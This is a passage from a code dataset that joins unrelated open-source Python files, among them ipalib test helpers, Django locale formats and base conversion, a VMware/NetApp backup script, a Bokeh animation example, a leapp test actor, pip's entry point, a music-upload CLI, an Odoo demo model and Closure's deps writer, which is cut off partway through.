    cls = property(__get_cls)

    def __get_subcls(self):
        cached = self.__subcls
        if cached is None:
            cached = self.__subcls = self.get_subcls()
        assert inspect.isclass(cached)
        return cached
    subcls = property(__get_subcls)

    def get_subcls(self):
        # Subclasses that use ``self.subcls`` must override this hook.
        raise NotImplementedError(self.__class__.__name__, 'get_subcls()')

    def tearDown(self):
        """
        nose tear-down fixture.
        """
        # ``context`` is the module-level shared request context -- wipe it
        # between tests so state cannot leak across test cases.
        context.__dict__.clear()
def check_TypeError(value, type_, name, callback, *args, **kw):
    """
    Tests a standard TypeError raised with `errors.raise_TypeError`.

    :param value: the offending value attached to the exception
    :param type_: the type the value was expected to be
    :param name: the argument name attached to the exception
    :param callback: callable expected to raise the TypeError
    """
    e = raises(TypeError, callback, *args, **kw)
    # NOTE(review): .value/.type/.name are extra attributes set by ipalib's
    # raise_TypeError helper, not standard TypeError attributes -- confirm.
    assert e.value is value
    assert e.type is type_
    assert e.name == name
    assert type(e.name) is str
    # The message must match ipalib's canonical TYPE_ERROR template.
    assert str(e) == ipalib.errors.TYPE_ERROR % (name, type_, value)
    return e
def get_api(**kw):
    """
    Returns (api, home) tuple.

    Behaviorally identical to `create_test_api`: builds a unit-test
    `ipalib.plugable.API` plus a `TempHome`, applying any extra env
    overrides passed as keyword arguments.
    """
    home = TempHome()
    api = ipalib.create_api(mode='unit_test')
    api.env.in_tree = True
    for (key, value) in kw.items():
        api.env[key] = value
    return (api, home)
def create_test_api(**kw):
    """
    Returns (api, home) tuple.

    Builds a unit-test `ipalib.plugable.API` instance together with a
    `TempHome`; keyword arguments become env overrides on the api.
    """
    home = TempHome()
    api = ipalib.create_api(mode='unit_test')
    api.env.in_tree = True
    for key in kw:
        api.env[key] = kw[key]
    return (api, home)
class PluginTester(object):
    """Base class for testing an ipalib plugin class set via ``_plugin``."""

    __plugin = None  # lazily-resolved plugin class

    def __get_plugin(self):
        # Resolve and validate the plugin class under test.
        if self.__plugin is None:
            self.__plugin = self._plugin
        assert issubclass(self.__plugin, Plugin)
        return self.__plugin
    plugin = property(__get_plugin)

    def register(self, *plugins, **kw):
        """
        Create a testing api and register ``self.plugin``.

        This method returns an (api, home) tuple.

        :param plugins: Additional \*plugins to register.
        :param kw: Additional \**kw args to pass to `create_test_api`.
        """
        (api, home) = create_test_api(**kw)
        api.register(self.plugin)
        for p in plugins:
            api.register(p)
        return (api, home)

    def finalize(self, *plugins, **kw):
        # Like register(), but also finalizes the api so it is usable.
        (api, home) = self.register(*plugins, **kw)
        api.finalize()
        return (api, home)

    def instance(self, namespace, *plugins, **kw):
        # Return (plugin_instance, api, home) looked up from *namespace*.
        (api, home) = self.finalize(*plugins, **kw)
        o = api[namespace][self.plugin.__name__]
        return (o, api, home)

    def tearDown(self):
        """
        nose tear-down fixture.
        """
        # Wipe the shared request context between tests.
        context.__dict__.clear()
class dummy_ugettext(object):
    """
    Test double for ``ugettext``: records a single call and returns a
    fixed translation.
    """

    # True once __call__ has been invoked; reset() clears it.
    __called = False

    def __init__(self, translation=None):
        if translation is None:
            translation = u'The translation'
        self.translation = translation
        assert type(self.translation) is unicode

    def __call__(self, message):
        # Enforce single use: a second call without reset() is a test bug.
        assert self.__called is False
        self.__called = True
        assert type(message) is str
        assert not hasattr(self, 'message')
        self.message = message
        assert type(self.translation) is unicode
        return self.translation

    def called(self):
        # Report whether the dummy has been invoked.
        return self.__called

    def reset(self):
        # Return the dummy to its pristine, callable-again state.
        assert type(self.translation) is unicode
        assert type(self.message) is str
        del self.message
        assert self.__called is True
        self.__called = False
class dummy_ungettext(object):
    """
    Test double for ``ungettext``: records a single call and returns a
    fixed singular or plural translation depending on *n*.
    """

    __called = False  # set after the first (and only allowed) call

    def __init__(self):
        self.translation_singular = u'The singular translation'
        self.translation_plural = u'The plural translation'

    def __call__(self, singular, plural, n):
        assert type(singular) is str
        assert type(plural) is str
        assert type(n) is int
        # Enforce single use, then record everything we were called with.
        assert self.__called is False
        self.__called = True
        self.singular = singular
        self.plural = plural
        self.n = n
        return self.translation_singular if n == 1 else self.translation_plural
class DummyMethod(object):
    """Callable that forwards each call as (name, args, kwargs) to a callback."""

    def __init__(self, callback, name):
        self.__callback = callback
        self.__name = name

    def __call__(self, *args, **kw):
        forward = self.__callback
        return forward(self.__name, args, kw)
class DummyClass(object):
    """
    Scripted mock: verifies that an exact sequence of method calls is made.

    Each element of *calls* is a (name, args, kw, result) tuple; a
    ``DummyMethod`` attribute is created per name, and every call is checked
    against the next expected tuple in order.
    """

    def __init__(self, *calls):
        self.__calls = calls
        self.__i = 0  # index of the next expected call
        for (name, args, kw, result) in calls:
            method = DummyMethod(self.__process, name)
            setattr(self, name, method)

    def __process(self, name_, args_, kw_):
        # Reject calls beyond the scripted sequence.
        if self.__i >= len(self.__calls):
            raise AssertionError(
                'extra call: %s, %r, %r' % (name_, args_, kw_)
            )
        (name, args, kw, result) = self.__calls[self.__i]
        self.__i += 1
        i = self.__i
        # Verify method name, positional args and keyword args in turn.
        if name_ != name:
            raise AssertionError(
                'call %d should be to method %r; got %r' % (i, name, name_)
            )
        if args_ != args:
            raise AssertionError(
                'call %d to %r should have args %r; got %r' % (i, name, args, args_)
            )
        if kw_ != kw:
            raise AssertionError(
                'call %d to %r should have kw %r, got %r' % (i, name, kw, kw_)
            )
        # A scripted Exception result is raised instead of returned.
        if isinstance(result, Exception):
            raise result
        return result

    def _calledall(self):
        # True once every scripted call has been consumed.
        return self.__i == len(self.__calls)
|
saideepchandg/oracle-r12-accounting | refs/heads/master | lib/django/conf/locale/lv/formats.py | 115 | # -*- encoding: utf-8 -*-
# This file is distributed under the same license as the Django package.
#
from __future__ import unicode_literals
# The *_FORMAT strings use the Django date format syntax,
# see http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
# The *_FORMAT strings use the Django date format syntax; backslash-escaped
# letters (e.g. \g\a\d\a -> "gada", Latvian for "year's") are literal text.
DATE_FORMAT = r'Y. \g\a\d\a j. F'
TIME_FORMAT = 'H:i'
DATETIME_FORMAT = r'Y. \g\a\d\a j. F, H:i'
YEAR_MONTH_FORMAT = r'Y. \g. F'
MONTH_DAY_FORMAT = 'j. F'
SHORT_DATE_FORMAT = r'j.m.Y'
SHORT_DATETIME_FORMAT = 'j.m.Y H:i'
FIRST_DAY_OF_WEEK = 1  # Monday
# The *_INPUT_FORMATS strings use the Python strftime format syntax,
# see http://docs.python.org/library/datetime.html#strftime-strptime-behavior
# Kept ISO formats as they are in first position
DATE_INPUT_FORMATS = (
    '%Y-%m-%d', '%d.%m.%Y', '%d.%m.%y',  # '2006-10-25', '25.10.2006', '25.10.06'
)
TIME_INPUT_FORMATS = (
    '%H:%M:%S',     # '14:30:59'
    '%H:%M:%S.%f',  # '14:30:59.000200'
    '%H:%M',        # '14:30'
    '%H.%M.%S',     # '14.30.59'
    '%H.%M.%S.%f',  # '14.30.59.000200'
    '%H.%M',        # '14.30'
)
DATETIME_INPUT_FORMATS = (
    '%Y-%m-%d %H:%M:%S',     # '2006-10-25 14:30:59'
    '%Y-%m-%d %H:%M:%S.%f',  # '2006-10-25 14:30:59.000200'
    '%Y-%m-%d %H:%M',        # '2006-10-25 14:30'
    '%d.%m.%Y %H:%M:%S',     # '25.10.2006 14:30:59'
    '%d.%m.%Y %H:%M:%S.%f',  # '25.10.2006 14:30:59.000200'
    '%d.%m.%Y %H:%M',        # '25.10.2006 14:30'
    '%d.%m.%Y',              # '25.10.2006'
    '%d.%m.%y %H:%M:%S',     # '25.10.06 14:30:59'
    '%d.%m.%y %H:%M:%S.%f',  # '25.10.06 14:30:59.000200'
    '%d.%m.%y %H:%M',        # '25.10.06 14:30'
    '%d.%m.%y %H.%M.%S',     # '25.10.06 14.30.59'
    '%d.%m.%y %H.%M.%S.%f',  # '25.10.06 14.30.59.000200'
    '%d.%m.%y %H.%M',        # '25.10.06 14.30'
    '%d.%m.%y',              # '25.10.06'
)
DECIMAL_SEPARATOR = ','
THOUSAND_SEPARATOR = ' '  # Non-breaking space
NUMBER_GROUPING = 3
|
seattle-biomed/ontap-api-wrapper | refs/heads/master | examples/backup-vmware-netapp/backup-vmware-netapp.py | 2 | #!/opt/virtualenv/admintools/bin/python
import argparse
import functools
import pysphere
import re
import socket
import sys
import time
import yaml
# Load NetApp API wrapper:
sys.path.append('/opt/netapp-manageability-sdk-4.1/lib/python/NetApp')
import Ontap
def clean_vm_snaps(servers, vms_by_ds, datastore, skip_vms=None,
                   dry_run=False):
    """
    Remove the 'backup' snapshot from every VM on *datastore*.

    :param servers: dict mapping vCenter hostname -> connected VIServer
    :param vms_by_ds: dict mapping datastore -> {vmx path: vCenter hostname}
    :param datastore: name of the datastore to clean
    :param skip_vms: optional list of .vmx paths to leave untouched
    :param dry_run: when True, only log what would be done

    Fixes vs. original: ``skip_vms=[]`` mutable default replaced with None
    sentinel; ``skip_vms.count(vmx)`` replaced with the idiomatic (and O(1)
    short-circuiting) ``in`` membership test; dead ``pass`` removed.
    """
    if skip_vms is None:
        skip_vms = []
    for vmx in vms_by_ds[datastore].keys():
        if vmx in skip_vms:
            continue
        v_print("Removing snapshot on %s..." % vmx, 3)
        if not dry_run:
            try:
                vm = servers[vms_by_ds[datastore][vmx]].get_vm_by_path(vmx)
                vm.delete_named_snapshot('backup')
            except pysphere.resources.vi_exception.VIException:
                # Deliberately best-effort: log and continue with other VMs.
                v_print("Failed to remove snapshot on %s!" % vmx, 1)
                v_print('Manual snapshot deletion may be required.', 2)
        v_print('done.', 3)
def set_mode_from_args():
    """
    Parse command line arguments.

    Return (v_print, dry_run): a verbosity-bound print helper and a flag
    indicating whether snapshot creation should be skipped.
    """
    parser = argparse.ArgumentParser(
        description='Coordinate VMware and NetApp backups.')
    parser.add_argument('-n', '--noexec', action='store_true',
                        help='Dry run - do not create any snapshots')
    parser.add_argument('-q', '--quiet', action='store_true',
                        help='Reduce output to only errors')
    parser.add_argument('-v', '--verbose', action='store_true',
                        help='Produce verbose output')
    args = parser.parse_args()
    # -v wins over -q; default verbosity shows warnings and errors.
    if args.verbose:
        verbosity = 3
    elif args.quiet:
        verbosity = 1
    else:
        verbosity = 2
    v_print = functools.partial(verbose_print, verbosity=verbosity)
    return (v_print, args.noexec)
def verbose_print(output, level, verbosity=2):
    """
    Print *output* with a timestamp prefix when *level* <= *verbosity*.

    verbosity level 3 prints all messages
    verbosity level 2 prints only warning or error messages
    verbosity level 1 prints only error messages

    Fix vs. original: the py2-only ``print now, output`` statement is
    replaced with a single-argument ``print(...)`` call producing the same
    "<timestamp> <output>" line on both Python 2 and Python 3.
    """
    if level <= verbosity:
        now = time.strftime("%b %d %H:%M:%S", time.localtime())
        print('%s %s' % (now, output))
if __name__ == '__main__':
    """
    Coordinate VMware snapshots with NetApp SnapVault snapshots.
    Required NetApp role permissions: login-http-admin,
    api-system-get-version, api-snapvault-primary-initiate-snapshot-create,
    api-volume-list-info, api-snapvault-secondary-initiate-snapshot-create
    Required vSphere role permissions:
    -Virtual machine: State: Create snapshot
    -Virtual machine: State: Remove snapshot
    """
    # Parse arguments:
    (v_print, dry_run) = set_mode_from_args()
    # Gather authentication info
    # NOTE(review): the auth YAML is assumed to hold 'filers' and 'vcenter'
    # lists of dicts with hostname/user/passwd keys -- confirm against file.
    f = open('/opt/ops-scripts/etc/vmware-netapp-backup-auth.yaml')
    auth = yaml.load(f.read())
    f.close()
    # Read VMware datastore to NetApp volume mapping configuration:
    f = open('/opt/ops-scripts/etc/vmware-netapp-backup-config.yaml')
    config = yaml.load(f.read())
    f.close()
    # Connect to NetApp filers:
    filers = {}
    for filer in auth['filers']:
        v_print("Connecting to filer %s" % filer['hostname'], 3)
        filers[filer['hostname']] = Ontap.Filer(filer['hostname'],
                                                filer['user'],
                                                filer['passwd'])
    # Connect to all vSphere instances:
    servers = {}
    for vcenter in auth['vcenter']:
        vc = pysphere.VIServer()
        v_print("Connecting to vCenter host %s" % vcenter['hostname'], 3)
        try:
            vc.connect(vcenter['hostname'], vcenter['user'], vcenter['passwd'])
        except socket.error:
            # An unreachable vCenter is non-fatal: its VMs are skipped.
            v_print("Could not connect to vCenter host %s" %
                    vcenter['hostname'], 1)
            continue
        servers[vcenter['hostname']] = vc
    # Generate dict of VMs by datastore:
    vms_by_ds = {}
    for vchost in servers.keys():
        v_print("Cataloging vCenter host %s" % vchost, 3)
        server = servers[vchost]
        vmlist = server.get_registered_vms()
        for vmx in vmlist:
            # Registered VM paths look like "[datastore] path/to/vm.vmx".
            match = re.search(r'^\[(.*)\] (\S+)$', vmx)
            if match:
                datastore = match.groups()[0]
                if not vms_by_ds.has_key(datastore):
                    vms_by_ds[datastore] = {}
                vms_by_ds[datastore][vmx] = vchost
    #
    # Do backups per datastore to optimize performance
    #
    for datastore in config['datastores']:
        v_print("Snapping contents of %s" % datastore['name'], 3)
        # Track off VMs - don't try to snap them:
        off_vms = []
        if not vms_by_ds.has_key(datastore['name']):
            v_print("No VMs found in %s" % datastore['name'], 3)
            continue
        #
        # Take VMware VM-level snapshots
        #
        # NOTE: .keys() yields a list copy (py2), so the del below is safe.
        for vmx in vms_by_ds[datastore['name']].keys():
            try:
                vm = servers[vms_by_ds[datastore['name']][vmx]].get_vm_by_path(vmx)
            except pysphere.resources.vi_exception.VIException as e:
                v_print("Failed to get_vm with %s!" % vmx, 1)
                v_print("Exception detail: %s" % e, 1)
                v_print("Expected VM to be on host %s" %
                        vms_by_ds[datastore['name']][vmx], 2)
                v_print("%s will not get a VMware snapshot." % vmx, 2)
                del vms_by_ds[datastore['name']][vmx]
                continue
            # Skip off VMs:
            if vm.get_status() == 'POWERED OFF':
                v_print("%s is off - will not take VMware snap" % vmx, 3)
                off_vms.append(vmx)
                continue
            v_print("Snapping %s..." % vmx, 3)
            if not dry_run:
                try:
                    vm.create_snapshot('backup', memory=False, quiesce=True)
                except pysphere.resources.vi_exception.VIException:
                    v_print("Failed to snap %s!" % vmx, 1)
                    pass  # bravely march on
            v_print('done.', 3)
        #
        # Take NetApp snapshot
        #
        try:
            pri_vol = filers[datastore['primary']].get_volume(
                datastore['pri_vol'])
            v_print("Snapping %s..." % datastore['pri_vol'], 3)
            if not dry_run:
                pri_vol.snapvault_primary_snap('sv_daily')
            v_print('done.', 3)
        except Ontap.OntapApiException as e:
            v_print('FAILURE: Exiting due to OntapApiException', 1)
            # Clean up snapshots on the way out the door:
            clean_vm_snaps(servers, vms_by_ds, datastore['name'],
                           off_vms)
            v_print("Code: %s - %s" % (e.errno, e.reason), 2)
            raise
        except:
            raise
        #
        # Remove VMware VM-level snapshots
        #
        clean_vm_snaps(servers, vms_by_ds, datastore['name'], off_vms,
                       dry_run)
    #
    # Send NetApp snapshots to SnapVault secondary, where configured
    #
    for datastore in config['datastores']:
        if datastore.has_key('secondary'):
            sec_vol = filers[datastore['secondary']].get_volume(
                datastore['sec_vol'])
            if sec_vol is False:
                v_print("Secondary volume %s does not exist on %s!" %
                        (datastore['sec_vol'],
                         filers[datastore['secondary']].name),
                        1)
                continue
            v_print("Initiating transfer to %s" % datastore['sec_vol'], 3)
            if not dry_run:
                sec_vol.snapvault_secondary_snap('sv_daily')
            v_print('done.', 3)
    # Give the secondary transfers time to run before the script exits.
    if not dry_run:
        v_print('Sleeping for 600 seconds.', 3)
        time.sleep(600)
|
ericdill/bokeh | refs/heads/master | examples/charts/server/line_animate.py | 37 | # The plot server must be running
# Go to http://localhost:5006/bokeh to view this plot
from collections import OrderedDict
import time
import numpy as np
from bokeh.charts import Line, curdoc, cursession, output_server, show
from bokeh.models import GlyphRenderer
N = 80  # number of sample points per curve
x = np.linspace(0, 4*np.pi, N)
xyvalues = OrderedDict(sin=np.sin(x), cos=np.cos(x))
output_server("line_animate")
chart = Line(xyvalues, title="Lines", ylabel='measures')
curdoc().add(chart)
show(chart)
# Grab the chart's glyph renderer so its data source can be mutated in place.
renderer = chart.select(dict(type=GlyphRenderer))
ds = renderer[0].data_source
# Animation loop: scale both series by a factor sweeping 1 -> -1 -> 1 forever.
while True:
    for i in np.hstack((np.linspace(1, -1, 100), np.linspace(-1, 1, 100))):
        for k, values in xyvalues.items():
            if k != 'x':
                ds.data['y_%s'%k] = values * i
        # Push the updated data source to the plot server each frame.
        cursession().store_objects(ds)
        time.sleep(0.05)
|
silenceli/nova | refs/heads/master | nova/api/openstack/compute/views/__init__.py | 12133432 | |
teemulehtinen/a-plus | refs/heads/master | external_services/migrations/__init__.py | 12133432 | |
Tejal011089/huntercamp_erpnext | refs/heads/develop | erpnext/buying/report/supplier_addresses_and_contacts/__init__.py | 12133432 | |
leapp-to/prototype | refs/heads/master | tests/data/workflow-tests/actors/firstactor/actor.py | 1 | import os
from leapp.actors import Actor
from leapp.dialogs import Dialog
from leapp.dialogs.components import BooleanComponent
from leapp.tags import FirstPhaseTag, UnitTestWorkflowTag
class FirstActor(Actor):
    """Unit-test workflow actor that runs in the first phase."""
    name = 'first_actor'
    description = 'No description has been provided for the first_actor actor.'
    consumes = ()
    produces = ()
    tags = (FirstPhaseTag, UnitTestWorkflowTag)
    dialogs = (
        Dialog(
            scope='unique_dialog_scope',
            reason='Confirmation',
            components=(
                BooleanComponent(
                    key='confirm',
                    # NOTE(review): the adjacent string literals concatenate
                    # without a separating space ("module?If no, ...") --
                    # possibly a typo in the label text.
                    label='Disable a deprecated module?'
                    'If no, the upgrade process will be interrupted.',
                    default=False,
                    description='Module XXX is no longer available '
                    'in RHEL-8 since it was replaced by shiny-metal-XXX.',
                    reason='Leaving this module in system configuration may lock out the system.'
                ),
            )
        ),)

    def process(self):
        # Record the execution for the unit-test harness, then validate the
        # workflow-provided configuration value.
        from leapp.libraries.common.test_helper import log_execution
        log_execution(self)
        if not self.configuration or self.configuration.value != 'unit-test':
            self.report_error('Unit test failed due missing or invalid workflow provided configuration')
        # Environment switch lets tests force an error report from this actor.
        if os.environ.get('FirstActor-ReportError') == '1':
            self.report_error("Unit test requested error")
        # Exercise the dialog machinery; the answer value itself is unused.
        self.get_answers(self.dialogs[0]).get('confirm', False)
|
FlintHill/SUAS-Competition | refs/heads/master | env/lib/python2.7/site-packages/pip/__main__.py | 38 | from __future__ import absolute_import
import os
import sys
# If we are running from a wheel, add the wheel to sys.path
# This allows the usage python pip-*.whl/pip install pip-*.whl
if __package__ == '':
    # __file__ is pip-*.whl/pip/__main__.py
    # first dirname call strips off '/__main__.py', second strips off '/pip'
    # Resulting path is the name of the wheel itself
    # Add that to sys.path so we can import pip
    path = os.path.dirname(os.path.dirname(__file__))
    sys.path.insert(0, path)

from pip._internal import main as _main  # isort:skip # noqa

if __name__ == '__main__':
    # Exit with pip's return code so shells see success/failure correctly.
    sys.exit(_main())
|
forblackking/PyBiu | refs/heads/master | run.py | 1 | #!/usr/bin/env python
# -*- coding:utf-8 -*-
# @author:Hieda no Chiaki <i@wind.moe>
import getopt
import os
import sys
import logging
from src.init import init, usage
from src.md5 import md5
from src.post import post_biu, confirm
from src.dir import que
try:
import configparser
import queue
except ImportError:
import ConfigParser
from Queue import Queue
logging.basicConfig(level=logging.INFO)
if len(sys.argv) == 1:
    # No arguments: check the upload environment and connectivity.
    """检察上传环境"""
    logging.info("Checking System Environments...")
    try:
        import requests
    except:
        logging.info('Please install requests. [pip install requests]')
        exit(1)
    init()
    # Retry three times; report a network failure if still unreachable.
    logging.info("Connect to Biu.moe...")
    for i in range(0, 3):
        try:
            r = requests.get('http://biu.moe/', timeout=3)
            if r.status_code != 200:
                raise ValueError()
            break
        except Exception as e:
            if i == 2:
                logging.info("Fail. Please check your internet connection.")
                exit(1)
            continue
    logging.info("Success.")
else:
    # Argument mode: -f FILE uploads one file, -d DIR uploads a directory,
    # -v prints the version, -h shows usage.
    try:
        opts, args = getopt.getopt(sys.argv[1:], "hvf:d:", ["update"])
    except getopt.GetoptError:
        sys.exit()
    for argv, value in opts:
        if argv in "-f":
            file = value
            if not os.path.exists(file):
                # Fall back to a path relative to this script's directory.
                file = os.path.split(os.path.realpath(__file__))[0] + file
                logging.info(file)
                if not os.path.exists(file):
                    logging.info("找不到文件.请尝试用双引号将文件绝对路径包括起来.")
                else:
                    logging.info("test")
                    flag, token, title = post_biu(file)
                    sys.exit() if not flag else confirm(title, file, md5(file, "file"), token)
                    pass
            else:
                # Quote the path if it is not already quoted.
                if file[0] != "\"":
                    file = "\"" + file + "\""
                flag, token, title = post_biu(file)
                if not flag == 1:
                    sys.exit()
                else:
                    confirm(title, file, md5(file, "file"), token)
                    pass
        elif argv in "-d":  # upload a whole directory
            path = value
            if os.path.isdir(path):
                cnt = 0
                q = que(path)
                # Queue class differs between py2 and py3 imports above.
                try:
                    task_queue = Queue()
                except:
                    task_queue = queue.Queue()
                if not q.empty():
                    logging.info("可以直接上传的歌曲列表")
                    while not q.empty():
                        info = q.get()
                        logging.info(info[1])
                        task_queue.put(info)
                else:
                    print("上传队列为空,请检查目录的合法文件")
                    sys.exit()
                logging.info("请确认是否开始批量上传 Y/N")
                # raw_input() exists on py2 only; fall back to input() on py3.
                try:
                    choose = raw_input()
                except NameError:
                    choose = input()
                if choose in ["Y", "y"]:
                    while not task_queue.empty():
                        task = task_queue.get()
                        confirm(task[1], task[2], md5(task[2], "file"), task[0], auto=1)
                else:
                    logging.info("取消批量上传.")
                    pass
            else:
                logging.info("您输入了非法的文件夹路径,请尝试重新输入")
                pass
            pass
        elif argv in "-v":
            # configparser (py3) vs ConfigParser (py2) API differences.
            try:
                config = configparser.ConfigParser()
                config.read_file(open('./.env'))
            except:
                config = ConfigParser.ConfigParser()
                config.readfp(open('./.env'))
            version = config.get("Environment", "VERSION")
            logging.info(version)
        elif argv in "-h":
            usage()
            sys.exit()
        else:
            pass
    for argv in args:
        if argv in "update":
            logging.info("update")
        elif argv in "test":
            logging.info("test.")
        else:
            pass
|
Innovahn/odoo.old | refs/heads/master | addons/web_tests_demo/__init__.py | 423 | from openerp.osv import orm, fields
class TestObject(orm.TransientModel):
    """Transient demo model backing the web test suite."""
    _name = 'web_tests_demo.model'
    _columns = {
        'name': fields.char("Name", required=True),
        'thing': fields.char("Thing"),
        'other': fields.char("Other", required=True)
    }
    # 'other' is required but defaulted, so records can be created without it.
    _defaults = {
        'other': "bob"
    }
|
auready/django | refs/heads/master | django/utils/baseconv.py | 129 | # Copyright (c) 2010 Guilherme Gondim. All rights reserved.
# Copyright (c) 2009 Simon Willison. All rights reserved.
# Copyright (c) 2002 Drew Perttula. All rights reserved.
#
# License:
# Python Software Foundation License version 2
#
# See the file "LICENSE" for terms & conditions for usage, and a DISCLAIMER OF
# ALL WARRANTIES.
#
# This Baseconv distribution contains no GNU General Public Licensed (GPLed)
# code so it may be used in proprietary projects just like prior ``baseconv``
# distributions.
#
# All trademarks referenced herein are property of their respective holders.
#
"""
Convert numbers from base 10 integers to base X strings and back again.
Sample usage::
>>> base20 = BaseConverter('0123456789abcdefghij')
>>> base20.encode(1234)
'31e'
>>> base20.decode('31e')
1234
>>> base20.encode(-1234)
'-31e'
>>> base20.decode('-31e')
-1234
>>> base11 = BaseConverter('0123456789-', sign='$')
>>> base11.encode('$1234')
'$-22'
>>> base11.decode('$-22')
'$1234'
"""
# Digit alphabets for the pre-built converters below; digit order defines
# digit value (index 0 is zero).
BASE2_ALPHABET = '01'
BASE16_ALPHABET = '0123456789ABCDEF'
# base56 omits visually ambiguous characters (0/O, 1/I/l, o).
BASE56_ALPHABET = '23456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnpqrstuvwxyz'
BASE36_ALPHABET = '0123456789abcdefghijklmnopqrstuvwxyz'
BASE62_ALPHABET = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
BASE64_ALPHABET = BASE62_ALPHABET + '-_'
class BaseConverter:
    """
    Convert base-10 integers to base-N strings and back.

    ``encode`` turns an int (or decimal string) into a string over *digits*;
    ``decode`` turns such a string back into an int. *sign* is the negative
    marker used in encoded output (default ``'-'``).
    """

    decimal_digits = '0123456789'

    def __init__(self, digits, sign='-'):
        self.sign = sign
        self.digits = digits
        if sign in self.digits:
            raise ValueError('Sign character found in converter base digits.')

    def __repr__(self):
        return "<{0}: base{1} ({2})>".format(
            self.__class__.__name__, len(self.digits), self.digits)

    def encode(self, i):
        neg, value = self.convert(i, self.decimal_digits, self.digits, '-')
        return self.sign + value if neg else value

    def decode(self, s):
        neg, value = self.convert(s, self.digits, self.decimal_digits, self.sign)
        return int('-' + value) if neg else int(value)

    def convert(self, number, from_digits, to_digits, sign):
        """Return (neg, digits-string of *number* re-expressed in *to_digits*)."""
        text = str(number)
        if text[0] == sign:
            neg = 1
            text = text[1:]
        else:
            neg = 0
        # Accumulate the magnitude as an int in base len(from_digits).
        value = 0
        for digit in text:
            value = value * len(from_digits) + from_digits.index(digit)
        # Re-emit the magnitude in base len(to_digits).
        if value == 0:
            encoded = to_digits[0]
        else:
            out = []
            while value > 0:
                value, rem = divmod(value, len(to_digits))
                out.append(to_digits[rem])
            encoded = ''.join(reversed(out))
        return neg, encoded
# Ready-made converter singletons for the common bases.
base2 = BaseConverter(BASE2_ALPHABET)
base16 = BaseConverter(BASE16_ALPHABET)
base36 = BaseConverter(BASE36_ALPHABET)
base56 = BaseConverter(BASE56_ALPHABET)
base62 = BaseConverter(BASE62_ALPHABET)
# base64 uses '-' as a digit, so '$' marks negative numbers instead.
base64 = BaseConverter(BASE64_ALPHABET, sign='$')
|
sdale28/Habitica-App | refs/heads/master | node_modules/accessibility-developer-tools/lib/closure-library/closure/bin/build/depswriter.py | 76 | #!/usr/bin/env python
#
# Copyright 2009 The Closure Library Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Generates out a Closure deps.js file given a list of JavaScript sources.
Paths can be specified as arguments or (more commonly) specifying trees
with the flags (call with --help for descriptions).
Usage: depswriter.py [path/to/js1.js [path/to/js2.js] ...]
"""
import json
import logging
import optparse
import os
import posixpath
import shlex
import sys
import source
import treescan
__author__ = 'nnaze@google.com (Nathan Naze)'
def MakeDepsFile(source_map):
  """Make a generated deps file.

  Args:
    source_map: A dict map of the source path to source.Source object.

  Returns:
    str, A generated deps file source.
  """
  # Write in path alphabetical order for deterministic output.
  lines = []
  for path in sorted(source_map):
    js_source = source_map[path]
    # Entries that provide nothing are omitted from the deps file.
    if js_source.provides:
      lines.append(_GetDepsLine(path, js_source))
  return ''.join(lines)
def _GetDepsLine(path, js_source):
  """Return one goog.addDependency(...) line for *js_source* at *path*."""
  provides = _ToJsSrc(sorted(js_source.provides))
  requires = _ToJsSrc(sorted(js_source.requires))
  module = 'true' if js_source.is_goog_module else 'false'
  parts = (path, provides, requires, module)
  return 'goog.addDependency(\'%s\', %s, %s, %s);\n' % parts
def _ToJsSrc(arr):
"""Convert a python arr to a js source string."""
return json.dumps(arr).replace('"', '\'')
def _GetOptionsParser():
  """Get the options parser.

  Returns an optparse.OptionParser configured with the flags documented in
  the module docstring (--output_file, --root, --root_with_prefix,
  --path_with_depspath).
  """
  parser = optparse.OptionParser(__doc__)
  parser.add_option('--output_file',
                    dest='output_file',
                    action='store',
                    help=('If specified, write output to this path instead of '
                          'writing to standard output.'))
  # Repeatable flags accumulate into lists via action='append'.
  parser.add_option('--root',
                    dest='roots',
                    default=[],
                    action='append',
                    help='A root directory to scan for JS source files. '
                    'Paths of JS files in generated deps file will be '
                    'relative to this path. This flag may be specified '
                    'multiple times.')
  parser.add_option('--root_with_prefix',
                    dest='roots_with_prefix',
                    default=[],
                    action='append',
                    help='A root directory to scan for JS source files, plus '
                    'a prefix (if either contains a space, surround with '
                    'quotes). Paths in generated deps file will be relative '
                    'to the root, but preceded by the prefix. This flag '
                    'may be specified multiple times.')
  parser.add_option('--path_with_depspath',
                    dest='paths_with_depspath',
                    default=[],
                    action='append',
                    help='A path to a source file and an alternate path to '
                    'the file in the generated deps file (if either contains '
                    'a space, surround with whitespace). This flag may be '
                    'specified multiple times.')
  return parser
def _NormalizePathSeparators(path):
"""Replaces OS-specific path separators with POSIX-style slashes.
Args:
path: str, A file path.
Returns:
str, The path with any OS-specific path separators (such as backslash on
Windows) replaced with URL-compatible forward slashes. A no-op on systems
that use POSIX paths.
"""
return path.replace(os.sep, posixpath.sep)
def _GetRelativePathToSourceDict(root, prefix=''):
  """Scans a top root directory for .js sources.

  Args:
    root: str, Root directory.
    prefix: str, Prefix for returned paths.

  Returns:
    dict, A map of relative paths (with prefix, if given), to source.Source
    objects.
  """
  # Remember and restore the cwd when we're done. We work from the root so
  # that paths are relative from the root.
  # NOTE(review): not exception-safe -- an error while scanning leaves the
  # process cwd changed; a try/finally would be safer.
  start_wd = os.getcwd()
  os.chdir(root)

  path_to_source = {}
  for path in treescan.ScanTreeForJsFiles('.'):
    prefixed_path = _NormalizePathSeparators(os.path.join(prefix, path))
    path_to_source[prefixed_path] = source.Source(source.GetFileContents(path))

  os.chdir(start_wd)

  return path_to_source
def _GetPair(s):
"""Return a string as a shell-parsed tuple. Two values expected."""
try:
# shlex uses '\' as an escape character, so they must be escaped.
s = s.replace('\\', '\\\\')
first, second = shlex.split(s)
return (first, second)
except:
raise Exception('Unable to parse input line as a pair: %s' % s)
def main():
  """CLI frontend to MakeDepsFile.

  Collects sources from positional args and the --root/--root_with_prefix/
  --path_with_depspath flags, then writes the generated deps file to
  --output_file or stdout.
  """
  logging.basicConfig(format=(sys.argv[0] + ': %(message)s'),
